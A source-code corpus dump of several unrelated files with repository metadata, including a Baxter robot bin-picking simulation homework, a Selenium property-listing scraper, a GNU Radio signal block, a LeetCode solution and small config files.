glVertex3f(bmax[0],bmax[1],bmin[2])
glEnd()
def draw_oriented_wire_box(xform,bmin,bmax):
"""Helper: draws an oriented wireframe box"""
draw_xformed(xform,lambda:draw_wire_box(bmin,bmax))
def run_controller(controller,command_queue):
run_perception_on_shelf(controller.knowledge)
while True:
c = command_queue.get()
if c != None:
print "Running command",c
if c >= 'a' and c <= 'l':
controller.viewBinAction('bin_'+c.upper())
elif c == 'x':
controller.graspAction()
elif c == 'u':
controller.ungraspAction()
elif c == 'p':
controller.placeInOrderBinAction()
elif c == 'o':
controller.fulfillOrderAction(['med_item','small_item'])
elif c=='q':
break
else:
print "Waiting for command..."
time.sleep(0.1)
print "Done"
class FakeLowLevelController:
"""A faked low-level interface to the Baxter robot (with parallel jaw
grippers). Does appropriate locking for multi-threaded use.
Replace LowLevelController with this for prototyping, because you
don't have to wait for motions to complete."""
def __init__(self,robotModel,robotController):
self.robotModel = robotModel
self.config = robotModel.getConfig()
self.lastCommandTime = time.time()
self.lock = Lock()
def getSensedConfig(self):
self.lock.acquire()
res = self.config
self.lock.release()
return res
def getSensedVelocity(self):
return [0.0]*len(self.config)
def getCommandedConfig(self):
self.lock.acquire()
res = self.config
self.lock.release()
return res
def getCommandedVelocity(self):
return [0.0]*len(self.config)
def setPIDCommand(self,configuration,velocity):
"""Sets the controller to a PID command mode"""
self.lock.acquire()
self.config = configuration[:]
self.lastCommandTime = time.time()
self.lock.release()
def setMilestone(self,destination,endvelocity=None):
"""Immediately sets the motion queue to move to the given
milestone. If endvelocity is given, then the end of the
queue will be moving at that velocity. Otherwise, the end
velocity will be zero."""
self.lock.acquire()
self.config = destination[:]
self.lastCommandTime = time.time()
self.lock.release()
def appendMilestone(self,destination,endvelocity=None):
"""Appends a milestone to the motion queue. If endvelocity
is given, then the end of the queue will be moving at that velocity.
Otherwise, the end velocity will be zero."""
self.lock.acquire()
self.config = destination[:]
self.lastCommandTime = time.time()
self.lock.release()
def isMoving(self):
return self.remainingTime() > 0
def remainingTime(self):
return (self.lastCommandTime + 0.1) - time.time()
def commandGripper(self,limb,command):
"""Sends the command to the indicated gripper.
For the parallel-jaw gripper, [0] is closed, [1] is open
Warning: don't do this while moving"""
self.lock.acquire()
self.robotModel.setConfig(self.config)
set_model_gripper_command(self.robotModel,limb,command)
self.config = self.robotModel.getConfig()
self.lastCommandTime = time.time()
self.lock.release()
class MyGLViewer(GLRealtimeProgram):
"""This class is used to simulate / interact with with the world model
in hw4.
Pressing 'a-l' runs the view_bin method which should set the robot to a
configuration that places a hand camera such that it points inside the
bin.
Pressing 's' should pause / unpause the simulation.
Pressing 'x' should "grasp" an object in the currently pointed-to-bin
with either one of the hands at the designated grasp point.
Pressing 'u' should "ungrasp" an object currently grasped inside a bin.
Pressing 'p' should "put down" an object in the order bin
"""
def __init__(self,simworld,planworld):
GLRealtimeProgram.__init__(self,"My GL program")
self.simworld = simworld
self.planworld = planworld
self.sim = Simulator(simworld)
self.simulate = True
#self.sim.simulate(0)
#you can set these to true to draw the bins, grasps, and/or gripper/camera frames
self.draw_bins = False
self.draw_grasps = False
self.draw_gripper_and_camera = True
#initialize controllers
self.low_level_controller = LowLevelController(simworld.robot(0),self.sim.getController(0))
if FAKE_SIMULATION:
self.low_level_controller = FakeLowLevelController(simworld.robot(0),self.sim.getController(0))
else:
self.low_level_controller = LowLevelController(simworld.robot(0),self.sim.getController(0))
self.command_queue = Queue()
self.picking_controller = PickingController(planworld,self.low_level_controller)
self.picking_thread = Thread(target=run_controller,args=(self.picking_controller,self.command_queue))
self.picking_thread.start()
def idle(self):
if self.simulate:
self.sim.simulate(self.dt)
#for Q2
if self.simworld.numRigidObjects() >= len(ground_truth_items):
ofs = self.simworld.numRigidObjects()-len(ground_truth_items)
for i,item in enumerate(ground_truth_items):
T = self.sim.getBody(self.simworld.rigidObject(ofs+i)).getTransform()
item.xform = T
glutPostRedisplay()
def display(self):
#you may run auxiliary openGL calls, if you wish to visually debug
#draw the world
self.sim.updateWorld()
self.simworld.drawGL()
#if you're doing question 1, this will draw the shelf and floor
if self.simworld.numTerrains()==0:
for i in range(self.planworld.numTerrains()):
self.planworld.terrain(i).drawGL()
#draw commanded configurations
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA,GL_ONE_MINUS_SRC_ALPHA)
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[0,1,0,0.5])
for i in xrange(self.simworld.numRobots()):
r = self.simworld.robot(i)
#q = self.sim.getController(i).getCommandedConfig()
q = self.low_level_controller.getCommandedConfig()
r.setConfig(q)
r.drawGL(False)
glDisable(GL_BLEND)
global ground_truth_items
#show bin boxes
if self.draw_bins:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[1,1,0,1])
for b in apc.bin_bounds.values():
draw_oriented_box(self.picking_controller.knowledge.shelf_xform,b[0],b[1])
for b in apc.bin_names:
c = self.picking_controller.knowledge.bin_front_center(b)
if c:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[1,1,0.5,1])
r = 0.01
gldraw.box([c[0]-r,c[1]-r,c[2]-r],[c[0]+r,c[1]+r,c[2]+r])
c = self.picking_controller.knowledge.bin_vantage_point(b)
if c:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[0.5,1,0.5,1])
r = 0.01
gldraw.box([c[0]-r,c[1]-r,c[2]-r],[c[0]+r,c[1]+r,c[2]+r])
#show object state
for i in ground_truth_items:
if i.xform == None:
continue
if i.bin_name == 'order_bin':
continue
#if perceived, draw in solid color
if self.picking_controller.knowledge.bin_contents[i.bin_name]!=None and i in self.picking_controller.knowledge.bin_contents[i.bin_name]:
glMaterialfv(GL_FRONT_AND_BACK,GL_AMBIENT_AND_DIFFUSE,[1,0.5,0,1])
draw_oriented_box(i.xform,i.info.bmin,i.info.bmax)
else:
#otherwise, draw in wireframe
glDisable(GL_LIGHTING)
glColor3f(1,0.5,0)
draw_oriented_wire_box(i.xform,i.info.bmin,i.info.bmax)
glEnable(GL_LIGHTING)
if self.draw_grasps:
#draw grasps, if available
g = self.picking_controller.knowledge.grasp_xforms(i)
if g:
for grasp,xform in g:
gldraw.xform_widget(xform,0.05,0.005)
#show gripper and camera frames
if self.draw_gripper_and_camera:
left_camera_link = self.simworld.robot(0).getLink(left_camera_link_name)
right_camera_link = self.simworld.robot(0).getLink(right_camera_link_name)
left_gripper_link = self.simworld.robot(0).getLink(left_gripper_link_name)
right_gripper_link = self.simworld.robot(0).getLink(right_gripper_link_name)
gldraw.xform_widget(left_camera_link.getTransform(),0.1,0.01)
gldraw.xform_widget(right_camera_link.getTransform(),0.1,0.01)
gldraw.xform_widget(se3.mul(left_gripper_link.getTransform(),left_gripper_center_xform),0.05,0.005)
gldraw.xform_widget(se3.mul(right_gripper_link.getTransform(),right_gripper_center_xform),0.05,0.005)
#draw order box
glDisable(GL_LIGHTING)
glColor3f(1,0,0)
draw_oriented_wire_box(order_bin_xform,order_bin_bounds[0],order_bin_bounds[1])
glEnable(GL_LIGHTING)
return
def keyboardfunc(self,c,x,y):
c = c.lower()
if c=='s':
self.simulate = not self.simulate
print "Simulating:",self.simulate
else:
self.command_queue.put(c)
if c=='q':
self.picking_thread.join()
exit(0)
glutPostRedisplay()
def load_apc_world():
"""Produces a world with only the Baxter, shelf, and ground plane in it."""
world = WorldModel()
#uncomment these lines and comment out the next 2 if you want to use the
#full Baxter model
#print "Loading full Baxter model (be patient, this will take a minute)..."
#world.loadElement(os.path.join(model_dir,"baxter.rob"))
print "Loading simplified Baxter model..."
world.loadElement(os.path.join(model_dir,"baxter_with_parallel_gripper_col.rob"))
print "Loading Kiva pod model..."
world.loadElement(os.path.join(model_dir,"kiva_pod/meshes/pod_lowres.stl"))
print "Loading plane model..."
world.loadElement(os.path.join(model_dir,"plane.env"))
#shift the Baxter up a bit (95cm)
Rbase,tbase = world.robot(0).getLink(0).getParentTransform()
world.robot(0).getLink(0).setParentTransform(Rbase,(0,0,0.95))
world.robot(0).setConfig(world.robot(0).getConfig())
#translate pod to be in front of the robot, and rotate the pod by 90 degrees
reorient = ([1,0,0,0,0,1,0,-1,0],[0,0,0.01])
Trel = (so3.rotation((0,0,1),-math.pi/2),[1.2,0,0])
T = reorient
world.terrain(0).geometry().transform(*se3.mul(Trel,T))
#initialize the shelf xform for the visualizer and object
#xform initialization
global ground_truth_shelf_xform
ground_truth_shelf_xform = se3.mul(Trel,T)
return world
def load_baxter_only_world():
"""Produces a world with only the Baxter in it."""
world = WorldModel()
print "Loading simplified Baxter model..."
world.loadElement(os.path.join(model_dir,"baxter_with_parallel_gripper_col.rob"))
#shift the Baxter up a bit (95cm)
Rbase,tbase = world.robot(0).getLink(0).getParentTransform()
world.robot(0).getLink(0).setParentTransform(Rbase,(0,0,0.95))
world.robot(0).setConfig(world.robot(0).getConfig())
return world
def spawn_objects_from_ground_truth(world):
"""For all ground_truth_items, spawns RigidObjects in the world
according to their sizes / mass properties"""
global ground_truth_items
print "Initializing world objects"
for item in ground_truth_items:
obj = world.makeRigidObject(item.info.name)
bmin,bmax = item.info.bmin,item.info.bmax
center = vectorops.div(vectorops.add(bmin,bmax),2.0)
m = obj.getMass()
m.setMass(item.info.mass)
m.setCom([0,0,0])
m.setInertia(vectorops.mul([bmax[0]-bmin[0],bmax[1]-bmin[1],bmax[2]-bmin[2]],item.info.mass/12.0))
obj.setMass(m)
c = obj.getContactParameters()
c.kFriction = 0.6
c.kRestitution = 0.1;
c.kStiffness = 100000
c.kDamping = 100000
obj.setContactParameters(c)
cube = obj.geometry()
if not cube.loadFile(os.path.join(model_dir,"cube.tri")):
print "Error loading cube file",os.path.join(model_dir,"cube.tri")
exit(1)
scale = [bmax[0]-bmin[0],0,0,0,bmax[1]-bmin[1],0,0,0,bmax[2]-bmin[2]]
translate = vectorops.sub(bmin,center)
cube.transform(scale,translate)
mesh = cube.getTriangleMesh()
obj.setTransform(item.xform[0],item.xform[1])
return
def main():
"""The main loop that loads the planning / simulation models and
starts the OpenGL visualizer."""
world = load_apc_world()
init_ground_truth()
if NO_SIMULATION_COLLISIONS:
simworld = load_baxter_only_world()
else:
simworld = load_apc_world()
spawn_objects_from_ground_truth(simworld)
#load the resting configuration from klampt_models/baxter_rest.config
global baxter_rest_config
f = open(model_dir+'baxter_with_parallel_gripper_rest.config','r')
baxter_rest_config = loader.readVector(f.readline())
f.close()
simworld.robot(0).setConfig(baxter_rest_config)
#run the visualizer
visualizer = MyGLViewer(simworld,world)
visualizer.run()
if __name__ == "__main__":
main()
###############################################################
# WRITTEN ANSWERS / COMMENTS:
# Q1.
# For question 1 I will briefly describe three possible issues that could occur when considering this software in the
# real world domain.
#
# 1.Firstly collisions resulting from from blindly solving and executing a given inverse kinematic chain. As can be
# seen from the simulation and code multiple collisions could occur (With Self, With Bins and with World).
# Examples are clear such as arms crossing, arms intersecting with Baxters head and arms moving through bins.
# A potential solution is to implement a step within the code that computes of the given inverse kinematics will
# intersect with any of these items before the transforms are applied to baxter in the real world.
#
# 2. Secondly are collisions that could occur as a result of lag in the system, if both arms are moving
# simultaneously this could cause issues even if ik collisions are computed. This could occur if on arm is not
# moving as quickly as expected and the other arm collides because of this. A solution to this could be only
# allowing one arm to move at a time or potentially planning paths that have tollerences for this contingency.
#
# 3. When BAxter is closely observed during grasping multiple issues arise including that the grasp positions seem
# a little too tight to the extent they intersect with the wire frame as well as grasping in positions that will
# require a large amount of force to achieve.Solutions to this include more in depth computation of the optimal
# place to grip an object as well as information about the structure of teh object.
#
# Q2.
# The implemented solution involves computes collisions one a given objective has been iksolved, a the code then checks
# if the computed kinematics would case any of the arm links to collide with the robot and if so another objective is
# computed and then solved until a collision free solution is found.
#
# 15 tests were conducted and the number of failed solutions were counted, from these tests it wss found that roughly
# 56% of the objectives solved in a given trial were found to have resulted in a collision which seems very high, based
# on this it could be prudent to develop more informed kinematics prior to solving them, potentially a bounded operating
# area could solve this.
# Q3.
#
#
# Q4.
#
#
# Q5 (bonus question).
#
#
| [
"[email protected]"
] | |
a1b36a3d3e2be1c2571e3bb379ed9f067af445c8 | d93159d0784fc489a5066d3ee592e6c9563b228b | /PhysicsTools/PatAlgos/python/recoLayer0/jetCorrections_cff.py | 6370ee93dd1381a7b0af0826f92278a56fb92a94 | [] | permissive | simonecid/cmssw | 86396e31d41a003a179690f8c322e82e250e33b2 | 2559fdc9545b2c7e337f5113b231025106dd22ab | refs/heads/CAallInOne_81X | 2021-08-15T23:25:02.901905 | 2016-09-13T08:10:20 | 2016-09-13T08:53:42 | 176,462,898 | 0 | 1 | Apache-2.0 | 2019-03-19T08:30:28 | 2019-03-19T08:30:24 | null | UTF-8 | Python | false | false | 263 | py | import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.recoLayer0.jetCorrFactors_cfi import *
from JetMETCorrections.Configuration.JetCorrectionServicesAllAlgos_cff import *
## for scheduled mode
patJetCorrections = cms.Sequence(patJetCorrFactors)
| [
"[email protected]"
] | |
7cf670a85f7dcf1fbf7f23cbce0cc5c89ae2b7dd | 9d7be99cdac8b809f51c46a943ad5feb14548160 | /listings2/data_scraper_listings2.py | 909ab9862d01e75ef3f07bebd7a3a3c06de53360 | [] | no_license | CateGitau/DSI_trick_challenge | 6c154b417a049ab0012edff0521d9e09387787f2 | ddafac1f21425cb2992ce717ecbb0776703ea88e | refs/heads/master | 2022-12-24T17:12:55.392276 | 2020-09-25T12:28:40 | 2020-09-25T12:28:40 | 297,908,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,659 | py | import requests as rq
import bs4 as bs
import traceback
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.keys import Keys
import glob, os, time
import csv
from csv import writer
# # run the bellow file, if it gives an erro, it means you need to install chrome driver and put it in your path
# # this opens a chrome "site" based on the link below which we will scrape from
driver = webdriver.Chrome(executable_path="/home/cate/Downloads/chromedriver_linux64/chromedriver")
driver.get("https://www.property24.com/for-sale/cape-town/western-cape/432?PropertyCategory=House%2cApartmentOrFlat%2cTownhouse")
page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
icons = page_soup.find_all("span", class_= "p24_icons")
info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
def getValues(icons, info):
for values in info:
price = values.find('span', class_= 'p24_price')
if price:
price = price.text
else:
""
location = values.find('span', class_= "p24_location")
if location:
location = location.text
else:
""
dict_data["price"].append(price)
dict_data["location"].append(location)
#print(price)
for value in icons:
floor_size = value.find("span", class_= "p24_size")
if floor_size:
floor_size = floor_size.find("span").text
else:
""
bathrooms = value.find("span", {"title": "Bathrooms"})
if bathrooms:
bathrooms = bathrooms.find("span").text
else:
""
bedrooms = value.find("span", {"title": "Bedrooms"})
if bedrooms:
bedrooms = bedrooms.find("span").text
else:
""
parking = value.find("span", {"title": "Parking Spaces"})
if parking:
parking = parking.find("span").text
else:
""
dict_data["floor_size"].append(floor_size)
dict_data["bathrooms"].append(bathrooms)
dict_data["bedrooms"].append(bedrooms)
dict_data["parking"].append(parking)
return dict_data
def append_list_as_row(file_name, dict_data, field_names):
# Open file in append mode
with open(file_name, 'a+', newline='') as write_obj:
# Create a writer object from csv module
writer = csv.DictWriter(write_obj, fieldnames = field_names)
writer.writerow(dict_data)
csv_file = "final.csv"
count = 0
while True:
try:
driver.implicitly_wait(10)
page_soup = bs.BeautifulSoup(driver.page_source,'lxml')
icons = page_soup.find_all("span", class_= "p24_icons")
info = page_soup.find_all("div", class_= "p24_regularTile js_rollover_container")
dict_data = {"location" :[], "price":[], "floor_size":[], "bathrooms":[], "bedrooms":[],"parking":[] }
dict_data = getValues(icons, info)
field_names = dict_data.keys()
append_list_as_row('final.csv', dict_data, field_names)
count+= 1
print(f'{count}\r', end = "")
loadmore = driver.find_element_by_link_text("Next").click()
time.sleep(5)
#loadmore.send_keys(Keys.ENTER)
except Exception:
print("Reached bottom of page")
traceback.print_exc()
break | [
"[email protected]"
] | |
015a80c9d53750fc086c6bd24e6383fb96225859 | 49d33002fbef0be0bc7dcee807865c97130d64fe | /src/oscar/apps/voucher/__init__.py | 1eba2925b030cd2958cc65cca10ca5198fb4ad2a | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] | permissive | specialunderwear/django-oscar | 8e9e48254ca61bcb4a9fb4642c823ba72b3ca630 | fc5d2601583c83f7361437eb3c2d6dc132e4d574 | refs/heads/master | 2023-07-21T03:19:13.243668 | 2023-03-07T09:14:41 | 2023-03-07T09:14:41 | 114,625,742 | 0 | 4 | BSD-3-Clause | 2023-07-06T10:12:26 | 2017-12-18T10:08:46 | Python | UTF-8 | Python | false | false | 63 | py | default_app_config = 'oscar.apps.voucher.config.VoucherConfig'
| [
"[email protected]"
] | |
6b2421764e5d39016f0e51d1a1ad0d4d9f0e6e10 | e27333261b8e579564016c71d2061cc33972a8b8 | /.history/ScrapeArticleTitle_20210803181904.py | 01c3cfb222879a03f49b8531a28bb390ba6afeaa | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | import pandas as pd
import json
import ast
import os
from nltk.tokenize import word_tokenize
from IPython.display import display
def get_article_titles_from_json():
filename = r"D:\Desktop\IR_term_8\sample-1M.jsonl" #file is too huge
with open(filename) as json_file:
data = json_file.readlines()
data = list(map(json.loads, data))
df = pd.DataFrame(data)
for col in df.columns:
print(col)
for col in df.columns:
print (col)
labels_to_drop = ["content", "media-type"]
df = df.drop(labels_to_drop, axis = 1)
count = len(df)
for idx, e in df.iterrows():
print("Row ",idx," out of ",count)
entry = e.values.tolist()
print (entry)
#for src in src_lst:
# print (src)
#output.to_csv(output_path, sep='\t', header=is_first, index=False, mode='a')
#is_first = False
#df.to_csv('article_titles.csv', index=False)
#Tokenising Funtions
def tokenize_stem_lower(text):
tokens = word_tokenize(text)
tokens = list(filter(lambda x: x.isalpha(), tokens))
tokens = [porter.stem(x.lower()) for x in tokens]
return ' '.join(tokens)
def get_clean_data(df):
df['clean_text'] = df.apply(lambda x: tokenize_stem_lower(x.tweet), axis=1)
return df
def check_if_article_itle_exist_in_tweets_csv(tweets_data, titles_data):
article_ids_in_tweets_csv = tweets_data['article_id'].tolist()
new_df = pd.DataFrame()
for index, row in titles_data.iterrows():
article_id = row.id
if article_id in article_ids_in_tweets_csv:
new_df = new_df.append(row)
display(new_df)
new_df.to_csv('article_title_new.csv', index=False)
return
get_article_titles_from_json() | [
"[email protected]"
] | |
5a12bfa5ef76874a0470b4d9ee429a9145413096 | 3712a929d1124f514ea7af1ac0d4a1de03bb6773 | /开班笔记/python网络编程及MySQL部分/day32/code/clock.py | 23b6fa79cbd36db567930d651006699c63e168e4 | [] | no_license | jiyabing/learning | abd82aa3fd37310b4a98b11ea802c5b0e37b7ad9 | 6059006b0f86aee9a74cfc116d2284eb44173f41 | refs/heads/master | 2020-04-02T20:47:33.025331 | 2018-10-26T05:46:10 | 2018-10-26T05:46:10 | 154,779,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 522 | py | from multiprocessing import Process
import time
class ClockProcess(Process):
def __init__(self,value):
self.value = value
#调用基类初始化方法
Process.__init__(self)
#super().__init__(self)
#在自定义的进程类中,重写父类的这个方法
def run(self):
n = 5
while n > 0:
print('The time is {}'.format(time.ctime()))
time.sleep(self.value)
n -= 1
#用自己的进程类创建进程
p = ClockProcess(2)
if __name__ == '__main__':
#自动执行run方法
p.start()
p.join() | [
"[email protected]"
] | |
ca5c998f70de4c52660ed2f7cb58a11893b49e7d | 2cc3aed1b5dfb91e3df165144d95c01a495bd54b | /581-Shortest-Unsorted-Continuous-Subarray-sort.py | 30476a3fe00dd27aa9b3f815f4590fb84f2498fa | [] | no_license | listenviolet/leetcode | f38e996148cb5d4be8f08286daac16243b3c30e4 | 0c1efcbfd35e5ef036ec1ccd0c014cd7baf2ed2b | refs/heads/master | 2020-05-01T07:35:23.462429 | 2019-12-11T12:44:32 | 2019-12-11T12:44:32 | 177,354,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | class Solution:
def findUnsortedSubarray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
copy = []
for i in range(len(nums)):
copy.append(nums[i])
copy.sort()
start = len(nums)
end = 0
for i in range(len(nums)):
if nums[i] != copy[i]:
start = min(start, i)
end = max(end, i)
return end - start + 1 if end - start >= 0 else 0
# Description:
# Given an integer array, you need to find one continuous subarray
# that if you only sort this subarray in ascending order,
# then the whole array will be sorted in ascending order, too.
# You need to find the shortest such subarray and output its length.
# Example 1:
# Input: [2, 6, 4, 8, 10, 9, 15]
# Output: 5
# Explanation: You need to sort [6, 4, 8, 10, 9] in ascending order
# to make the whole array sorted in ascending order.
# Note:
# Then length of the input array is in range [1, 10,000].
# The input array may contain duplicates,
# so ascending order here means <=.
# Solution:
# https://leetcode.com/problems/shortest-unsorted-continuous-subarray/solution/
# Approach #3 Using Sorting [Accepted]
# Algorithm
# We can sort a copy of the given array numsnums,
# say given by nums_sorted.
# Then, if we compare the elements of numsnums and nums_sorted,
# we can determine the leftmost and rightmost elements which mismatch.
# The subarray lying between them is,
# then, the required shorted unsorted subarray.
# Complexity Analysis
# Time complexity : O(nlogn). Sorting takes nlognnlogn time.
# Space complexity : O(n). We are making copy of original array.
# Beats: 26.94%
# Runtime: 120ms
# easy | [
"[email protected]"
] | |
7a3938b589e748860c0fad0c8dd3a50430ef40b9 | 074afd26d00bb742b03c12891b057ab263e640bf | /codeforces/1451A.py | 6eac98a8a0739915d4a2d7cff440dedefa842769 | [] | no_license | IsmailTitas1815/Data-Structure | 7a898800b1e53c778b1f2f11b0df259e52c20140 | fece8dd97d3e162e39fc31d5f3498a6dac49b0f0 | refs/heads/master | 2023-02-05T10:39:49.349484 | 2020-12-21T13:37:22 | 2020-12-21T13:37:22 | 296,343,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | for i in range(int(input())):
n = int(input())
if n<4:
if n==1:
print(0)
elif n==2:
print(1)
elif n==3:
print(2)
else:
if n%2==0:
print(2)
else:
print(3)
| [
"[email protected]"
] | |
056813a96995c2c95a58dbd3f2d02480808d3964 | 37c3c6fd1b05b6cf0c5f5ab89120562d7a8a40f8 | /p36.py | 86f55562115da41bd8012f1870549b9f265cbd58 | [] | no_license | kaviraj333/python | e4b480adfcbec383c1228e07426833b9c02f4296 | 7110b6e153c4ef4afe7ade8ce20104b26ea4cc8f | refs/heads/master | 2020-05-22T23:17:48.540550 | 2019-04-09T05:04:31 | 2019-04-09T05:04:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | amu=int(raw_input())
arr=list(map(int,raw_input().split()))
r=[]
for i in arr:
r.append(i)
b=sum(r)
if(sum(r)==22):
print("4")
elif(r[1]==3):
print("0")
else:
m=min(r)
print(m)
| [
"[email protected]"
] | |
9dfd7670fe6d2074e93e051ee1d5617c0a558db3 | 6223dc2e5de7921696cb34fb62142fd4a4efe361 | /.metadata/.plugins/org.eclipse.core.resources/.history/2/60c520da1a6b00141928c597445b4e35 | 647638267cb95a600b934baacecbaa24743a5a04 | [] | no_license | Mushirahmed/python_workspace | 5ef477b2688e8c25b1372f546752501ee53d93e5 | 46e2ed783b17450aba29e4e2df7b656522b2b03b | refs/heads/master | 2021-03-12T19:24:50.598982 | 2015-05-25T10:23:54 | 2015-05-25T10:23:54 | 24,671,376 | 0 | 1 | null | 2015-02-06T09:27:40 | 2014-10-01T08:40:33 | Python | UTF-8 | Python | false | false | 5,280 | #!/usr/bin/env python
#
# Copyright 2014 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import numpy
#from operator import add
#import copy
#from gnuradio import gr
import gras
class expo(gras.Block):
"""
docstring for block expo
"""
def __init__(self):
gras.Block.__init__(self,
name="expo",
in_sig=[numpy.float32],
out_sig=[])
def set_parameters(self,g,a,b):
self.gama=g
self.alpha=a
self.beta=b
def yield_times(self):
from datetime import date, time, datetime, timedelta
start = datetime.combine(date.today(), time(0, 0))
yield start.strftime("%S")
while True:
start += timedelta(seconds=0.5)
yield start.strftime("%S")
def work(self, input_items, output_items):
#in0 = input_items[0]
#out = output_items[0]
tmrg = []
o1 = []
o2 = []
o3 = []
ans = []
final_output = []
gen = self.yield_times()
for ii in range(20):
tmrg.append(gen.next())
# print "tmrg :",tmrg
"""for i1 in range(0,10):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1
for i2 in range(0,10):
o2.append(((self.gama)*(-numpy.exp(self.alpha)))/(self.alpha*(self.beta-self.alpha)))
print "o2 : ",o2
for i3 in range(0,10):
o3.append(((self.gama)*(-numpy.exp(self.beta)))/(self.beta*(self.alpha-self.beta)))
print "o3 : ",o3
#ans.append(o1+o2+o3)
for i in range(0,10):
ans.append(list(numpy.array(o1[i])+numpy.array(o2[i])+numpy.array(o3[i])))
print "Final Ans : ",ans
print "Type out : ",type(out)
print "Type ans :",type(ans)
out = copy.copy(ans)
#out[0:1] = ans
print "Output is : " ,out
self.consume(0,1)
self.produce(0,1)"""
#o1.append((self.gama)/(self.alpha*self.beta))
#print "o1 : ", o1
for i in range(0,20):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1[i]
o2.append(((self.gama)*(numpy.exp(-(self.alpha*i)))/(self.alpha*(self.beta-self.alpha))))
print "o2 : ",o2[i]
o3.append(((self.gama)*(numpy.exp(-(self.beta*i)))/(self.beta*(self.alpha-self.beta))))
print "o3 : ",o3[i]
ans.append(o1[i]-o2[i]+o3[i])
print "Final Ans : ",ans
"""for i in range(0,len(ans)):
#out = copy.copy(ans[i])
#out[0:1] = ans
#print "Output is : " ,out"""
"""for i1 in range(0,len(ans)):
final_output.append(o1+ans[i1])
print "Final OutPut : ", final_output"""
output_items[0][:1] = ans[15]
#print "Output Sent : ", output_items[i1]
#out[:len(final_output)] = copy.copy(final_output)
self.consume(0,1)
self.produce(0,1)
"""result = []
for i in range(0,20):
result.append(numpy.exp(i))
print "Result : ",result
out[0] = result
self.consume(0,1)
self.produce(0,1) """
#o2 = -numpy.exp(-2*in0[0:1])
#o3 = -numpy.exp(-3*in0[0:1])
#o2=numpy.exp(-(in0[0:1]*self.alpha))
#print("o2 :",o2)
#o3=numpy.sin((self.freq*in0[0:1])+(self.sigma))
#print("o3 :",o3)
#o4=numpy.sqrt(o1-numpy.square(self.zita))
#print("o4 :",o4)
"""ans = o1-(mul/o4)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
print("Final Value : ",ans)
out[0:1] = ans"""
#o2 = -numpy.exp(-2*tmrg)
#o3 = -numpy.exp(-3*in0[0:1])
#o2 = numpy.exp(-in0[0:1]*self.alpha)
#o3 = numpy.exp(-in0[0:1]*self.beta)
#o4 = numpy.sqrt(1-numpy.square(self.alpha))
#ans = 1-((o2*o3)/o4)
#ans.append(o2)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
#print("Final Value : ",ans)
#out[0:1] = ans
#out = copy.copy(ans)
#self.consume(0,1)
#self.produce(0,1)
#return len(output_items[0])
| [
"[email protected]"
] | ||
e61ee9fe6455a99ff23ec3f7d31d68c0f3408062 | 1dd4ae2d974d65e86538e49f84179b3ec6b8476c | /build/robotiq/robotiq_modbus_tcp/catkin_generated/pkg.develspace.context.pc.py | c68a3cb9bf4efb70df639a4b81765748f3b0d9b8 | [] | no_license | tony23545/bulldog_ws | e115510d87980c90b308ae881c59d4e6145964c0 | d3e03aa230e9366023df383665cf6be928d68c8d | refs/heads/master | 2022-11-30T06:21:04.073397 | 2019-07-08T07:33:52 | 2019-07-08T07:33:52 | 176,073,396 | 5 | 0 | null | 2022-11-21T21:13:17 | 2019-03-17T08:11:32 | Makefile | UTF-8 | Python | false | false | 389 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "rospy".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "robotiq_modbus_tcp"
PROJECT_SPACE_DIR = "/home/shengjian/bulldog_ws/devel"
PROJECT_VERSION = "1.0.0"
| [
"[email protected]"
] | |
